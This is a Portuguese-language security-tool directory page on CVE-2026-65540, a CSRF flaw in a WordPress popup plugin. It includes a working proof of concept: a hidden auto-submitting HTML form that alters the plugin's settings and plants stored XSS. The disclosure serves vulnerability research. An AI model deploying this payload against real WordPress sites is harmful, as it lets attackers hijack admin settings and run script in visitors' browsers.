Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-65540 — Popup para CF7 com Sweet Alert <= 1.6.5 - Cross-Site Request Forgery | Kitploit
Ferramentas/GitHubGitHub/testardou/cve-2026-65540
Scanners de Vulnerabilidades WebAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Web
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup para CF7 com Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Ver Repositório
há 14h 33mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-65540

Popup para CF7 com Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

URL do Plugin

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Descrição

O manipulador de configurações do plugin contém um erro de lógica na verificação de nonce, desativando toda a proteção CSRF. Um atacante não autenticado pode explorar isso enganando um administrador autenticado para visitar uma página maliciosa com um formulário oculto de envio automático, modificando arbitrariamente as configurações do plugin. Os valores enviados são armazenados sem sanitização e injetados literalmente em um bloco

POC

  1. Hospede a seguinte página HTML em um servidor separado:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  • Faça login no WordPress como administrador
  • Visite a página maliciosa
  • (Opcional) Navegue até http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — confirme que o campo Width agora contém 500;alert(document.domain)
  • Visite qualquer página do frontend — alert(document.domain) é executado no navegador, confirmando o XSS armazenado
  • Baixar ferramenta